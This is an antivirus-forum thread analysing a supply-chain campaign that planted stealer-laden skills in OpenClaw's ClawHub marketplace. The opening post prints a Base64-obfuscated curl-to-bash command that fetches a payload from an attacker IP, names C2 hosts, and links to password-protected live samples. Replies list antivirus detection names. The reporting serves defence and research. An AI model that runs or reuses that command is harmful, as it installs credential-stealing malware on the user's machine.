查看: 194|回复: 6
收起左侧

[病毒样本] OpenClaw成为供应链投毒攻击新目标

[复制链接]
pyic
发表于 昨天 23:29 | 显示全部楼层 |阅读模式



相关资讯:OpenClaw成为供应链投毒攻击新目标



OpenClaw供应链攻击事件

快速发展的开源AI Agent平台OpenClaw正面临严重的供应链风险,攻击者已在其ClawHub插件市场投放恶意Skills模块。安全公司SlowMist和Koi Security发现数百个遭篡改的扩展程序正在传播Atomic Stealer等信息窃取程序。

OpenClaw允许本地AI Agent通过ClawHub托管的Skills模块扩展实现工作流自动化、服务交互和设备控制。这些技能遵循AgentSkills规范,主要以包含可执行指令的SKILL.md文件夹形式存在,而非可审计的代码。这种设计将Markdown从文档转变为操作入口点,极易被滥用。

ClawHub宽松的上传流程缺乏严格审核,其漏洞模式与npm或VS Code市场类似。该平台近期用户激增,同时吸引了开发者和攻击者。Koi Security扫描了2,857个ClawHub Skills,发现341个恶意样本,感染率达12%,该行动被命名为ClawHavoc。SlowMist整合了400多个样本的IOC指标,确认472个受影响Skills共享基础设施。

恶意Skills特征

恶意Skills主要集中在加密货币工具(如Solana追踪器、Phantom钱包)、YouTube实用程序、Polymarket机器人以及"clawhub1"等仿冒名称。它们伪装成更新程序、安全检查或财务工具以规避检测。

攻击链分析

攻击者在SKILL.md的"前提条件"中嵌入两阶段载荷。用户执行Base64混淆的命令(如echo 'L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgaHR0cDovLzkxLjkyLjI0Mi4zMC83YnV1MjRseThtMXRuOG00KSI=' | base64 -D | bash)会触发curl | bash下载。

第一阶段投放器从91.92.242.30等IP获取脚本,随后下载第二阶段二进制文件(如x5ki60w1ih838sp7)。根据SlowMist分析,这些临时签名的Mach-O通用文件与Atomic macOS Stealer(AMOS)匹配,会窃取桌面/文档数据,通过socifiapp.com等C2服务器外传,并盗取钥匙串和浏览器凭证。

动态分析显示,攻击者会弹出密码钓鱼对话框,将.txt/.pdf文件打包为ZIP,并通过curl上传。域名/IP的重复使用(如91.92.242.30与Poseidon勒索组织关联)表明这是有组织的行动。

一个流行的"X(Twitter)趋势"技能隐藏了仿冒配置输出的Base64后门。解码后会从91.92.242.30/q0c7ew2ro8l2cfqp下载针对macOS文件夹的窃取程序dyrtvwjfveyxjf23。这种方法可规避关键词扫描并实现载荷快速替换。







相关样本:


https://wwaxy.lanzouu.com/i3XrG3i9h93a          密码:7q2e     PWS:infected


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
WGC_ZY
发表于 昨天 23:33 | 显示全部楼层
卡巴:
Component: File Anti-Virus
Result description: Detected
Type: Trojan
Name: HEUR:Trojan-PSW.OSX.Amos.bg
Precision: Heuristic analysis
Threat level: High
Object type: File
Object name: dyrtvwjfveyxjf23
Object path: C:\Users\Zhang\Downloads\dyrtvwjfveyxjf23
MD5 of an object: 760C89959E2D80F9B78A320023A875B7
Reason: Expert analysis
Databases release date: Today, 2/10/2026 19:03:00

ESET:
C:\Users\Zhang\Desktop\dyrtvwjfveyxjf23;a variant of OSX/PSW.Agent.GF trojan;cleaned by deleting;
C:\Users\Zhang\Desktop\dyrtvwjfveyxjf23 » FAT » file0000;a variant of OSX/PSW.Agent.GF trojan;cleaned by deleting;
C:\Users\Zhang\Desktop\dyrtvwjfveyxjf23 » FAT » file0001;a variant of OSX/PSW.Agent.GF trojan;cleaned by deleting;
莒县小哥
发表于 昨天 23:35 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
LingGao
发表于 昨天 23:48 | 显示全部楼层
Microsoft Defender

“dyrtvwjfveyxjf23”
Trojan:MacOS/Amos.FB!MTB
lingchenheiye
发表于 昨天 23:50 | 显示全部楼层
本帖最后由 lingchenheiye 于 2026-2-10 23:56 编辑

刚克隆仓库,我还想说怎么克隆完瞬间巨卡,然后ESSP疯狂报毒,随即长达数十分钟的报毒,产生超300条日志和删除记录。
报毒太多搞得我刚想查查怎么回事,结果就遇上这茬。发帖目前ESSP都还没删完


仓库链接:https://github.com/openclaw/skills


仓库疑似被严重投毒,不要拉取其中的文件

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
Myrenaser
发表于 昨天 23:53 | 显示全部楼层
红伞

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
心醉咖啡
发表于 6 小时前 | 显示全部楼层
360

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2026-2-11 06:12 , Processed in 0.088179 second(s), 3 queries , Redis On.

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表